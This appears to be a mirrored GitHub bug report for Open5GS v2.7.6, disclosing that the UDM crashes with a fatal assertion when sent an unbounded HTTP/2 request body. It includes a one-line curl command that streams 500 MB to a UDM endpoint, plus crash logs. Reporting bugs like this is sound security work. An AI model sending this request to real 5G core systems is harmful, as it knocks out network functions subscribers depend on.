Thanks to visit codestin.com
Credit goes to github.com

Skip to content

[Bug]: UDM crashes due to unbounded request body size leading to fatal assertion in SBI HTTP/2 handler #4265

@longx24

Description

@longx24

Open5GS Release, Revision, or Tag

v2.7.6

Steps to reproduce

python3 -c "import sys; sys.stdout.buffer.write(b'A' * (500 * 1024 * 1024))" |
curl -v --http2-prior-knowledge
-X PATCH
'http://127.0.0.12:7777/nudm-pp/v1/imsi-001010000000001/pp-data'
-H 'Content-Type: application/json-patch+json'
--data-binary @-

Logs

09/08 13:27:32.716: [sbi] FATAL: on_data_chunk_recv: Assertion
`request->http.content_length == 0' failed.
(../lib/sbi/nghttp2-server.c:1460)
09/08 13:27:32.716: [core] FATAL: backtrace() returned 9 addresses
(../lib/core/ogs-abort.c:37)

Expected behaviour

The UDM should gracefully reject the malformed request and return an appropriate HTTP error response (e.g., 400 Bad Request)

Observed Behaviour

The UDM process attempts to buffer the entire request body in memory.
When memory allocation fails, a fatal assertion is triggered in the SBI HTTP/2 handler, causing the UDM process to terminate and resulting in a Denial of Service.

eNodeB/gNodeB

No response

UE Models and versions

No response

Metadata

Metadata

Assignees

No one assigned

    Labels

    triageTriage label for new issues and feature requests

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions